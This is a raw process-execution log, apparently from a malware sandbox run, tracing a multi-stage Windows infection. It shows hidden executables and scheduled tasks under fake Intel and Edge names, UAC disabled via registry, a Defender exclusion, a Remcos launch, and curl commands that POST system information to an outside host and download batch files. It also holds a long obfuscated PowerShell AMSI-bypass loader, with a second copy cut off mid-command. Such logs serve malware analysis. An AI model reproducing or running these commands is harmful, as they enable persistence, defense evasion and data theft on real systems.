C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_3824_133785002056803866\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\LNY58Q9RQIE3" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp1BCD.tmp"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2764.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2764.tmp.bat
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgXUDNIiSLug{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZYajeWaIoaOFdv,[Parameter(Position=1)][Type]$UgPyToEjRy)$oEUkhTKkLHW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+'t'+'e'+'dD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+'e'+''+[Char](108)+'e'+'g'+''+'a'+''+[Char](116)+''+'e'+'T'+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+'a'+'s'+'s,A'+'u'+''+[Char](116)+'o'+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$oEUkhTKkLHW.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+'g'+','+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZYajeWaIoaOFdv).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');$oEUkhTKkLHW.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+'b'+'l'+'i'+''+'c'+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig,'+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+'tu'+'a'+''+[Char](108)+'',$UgPyToEjRy,$ZYajeWaIoaOFdv).SetImplementationFlags(''+'R'+''+'u'+''+'n'+'tim'+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+'a'+''+'g'+'e'+[Char](100)+'');Write-Output $oEUkhTKkLHW.CreateType();}$lCxnXoCHiNCxC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+'t.'+'W'+'i'+[Char](110)+''+[Char](51)+'2'+[Char](46)+'Un'+'s'+''+[Char](97)+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'t'+'h'+'od'+[Char](115)+'');$EsWBkLJmpsqmmi=$lCxnXoCHiNCxC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+''+'o'+'c'+[Char](65)+'dd'+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mJdEdiOIJmofLurRfJe=QgXUDNIiSLug @([String])([IntPtr]);$rwkYGviIMExKdKtATLXToX=QgXUDNIiSLug @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kBvuONqsLcM=$lCxnXoCHiNCxC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'eH'+'a'+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$xlhnxVDNDJJSJM=$EsWBkLJmpsqmmi.Invoke($Null,@([Object]$kBvuONqsLcM,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+'i'+'b'+''+'r'+''+'a'+''+[Char](114)+'yA')));$bTrCqJaplXEhjoCFd=$EsWBkLJmpsqmmi.Invoke($Null,@([Object]$kBvuONqsLcM,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ATVFyMF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xlhnxVDNDJJSJM,$mJdEdiOIJmofLurRfJe).Invoke(''+'a'+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+'d'+'l'+'l'+'');$DJzVFaXJiHfaAxCNM=$EsWBkLJmpsqmmi.Invoke($Null,@([Object]$ATVFyMF,[Object](''+[Char](65)+''+'m'+'s'+'i'+''+'S'+'ca'+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+'e'+[Char](114)+'')));$WRxKDdXESZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bTrCqJaplXEhjoCFd,$rwkYGviIMExKdKtATLXToX).Invoke($DJzVFaXJiHfaAxCNM,[uint32]8,4,[ref]$WRxKDdXESZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DJzVFaXJiHfaAxCNM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bTrCqJaplXEhjoCFd,$rwkYGviIMExKdKtATLXToX).Invoke($DJzVFaXJiHfaAxCNM,[uint32]8,0x20,[ref]$WRxKDdXESZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](114)+'u'+'t'+''+[Char](115)+''+[Char](115)+''+[Char](116)+'a'+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bfnbfv.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a6a4520d-0eb0-4800-8aa9-c048e88a2276}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\dbiqxa.exe
"C:\Users\Admin\AppData\Local\Temp\dbiqxa.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\10000520110\123719821238.dll, Main
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xbLNqjNtmRQe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ClxSVZLToccRmq,[Parameter(Position=1)][Type]$bKOlTDSDbL)$TlZkTcYkDKA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+'e'+[Char](99)+'t'+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'em'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+'l'+'e'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+'ns'+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$TlZkTcYkDKA.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+'e,'+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+'S'+'i'+'g'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ClxSVZLToccRmq).SetImplementationFlags(''+'R'+'un'+[Char](116)+'i'+[Char](109)+'e'+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$TlZkTcYkDKA.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+'a'+'l'+'',$bKOlTDSDbL,$ClxSVZLToccRmq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $TlZkTcYkDKA.CreateType();}$SSTtORKJSyANf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 